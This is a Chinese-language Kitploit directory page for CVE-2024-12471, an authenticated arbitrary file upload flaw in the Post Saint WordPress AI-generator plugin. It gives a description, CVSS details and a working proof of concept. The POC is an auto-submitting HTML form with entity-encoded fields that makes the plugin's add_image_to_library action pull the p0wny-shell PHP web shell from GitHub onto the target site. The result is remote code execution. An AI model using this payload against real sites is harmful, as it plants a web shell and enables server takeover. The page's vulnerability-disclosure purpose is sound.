Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-12471 — Post Saint:ChatGPT、GPT4、DALL-E、Stable Diffusion、Pexels、Dezgo AI 文本与图像生成器 <= 1.3.1 - 缺少授权导致已认证(订阅者+)任意文件上传 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-12471
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubrandomrobbiebf/cve-2024-12471

CVE-2024-12471

Post Saint:ChatGPT、GPT4、DALL-E、Stable Diffusion、Pexels、Dezgo AI 文本与图像生成器 <= 1.3.1 - 缺少授权导致已认证(订阅者+)任意文件上传

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-12471

Post Saint:ChatGPT、GPT4、DALL-E、Stable Diffusion、Pexels、Dezgo AI 文本与图像生成器 <= 1.3.1 - 缺少授权,导致已认证(订阅者及以上)任意文件上传

描述

WordPress 插件 Post Saint:ChatGPT、GPT4、DALL-E、Stable Diffusion、Pexels、Dezgo AI 文本与图像生成器在所有版本(包括 1.3.1)中,由于 add_image_to_library AJAX 操作函数缺少能力检查与文件类型验证,存在任意文件上传漏洞。这使得具有订阅者级别及以上访问权限的已认证攻击者能够上传任意文件,从而实现远程代码执行。

详情

  • 类型:插件
  • Slug:post-saint
  • 受影响版本:1.3.1
  • CVSS 评分:8.8
  • CVSS 评级:高危
  • CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CVE:CVE-2024-12471
  • 状态:已关闭

POC

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="add&#95;image&#95;to&#95;library" />
      <input type="hidden" name="image&#95;url" value="https&#58;&#47;&#47;raw&#46;githubusercontent&#46;com&#47;flozz&#47;p0wny&#45;shell&#47;refs&#47;heads&#47;master&#47;shell&#46;php" />
      <input type="hidden" name="image&#95;prompt" value="say&#32;hello" />
      <input type="hidden" name="insert&#95;prompt&#95;media&#95;library&#95;fields" value="caption&#95;description" />
      <input type="hidden" name="image&#95;generator" value="pexels" />
      <input type="hidden" name="log&#95;id" value="1667" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
下载工具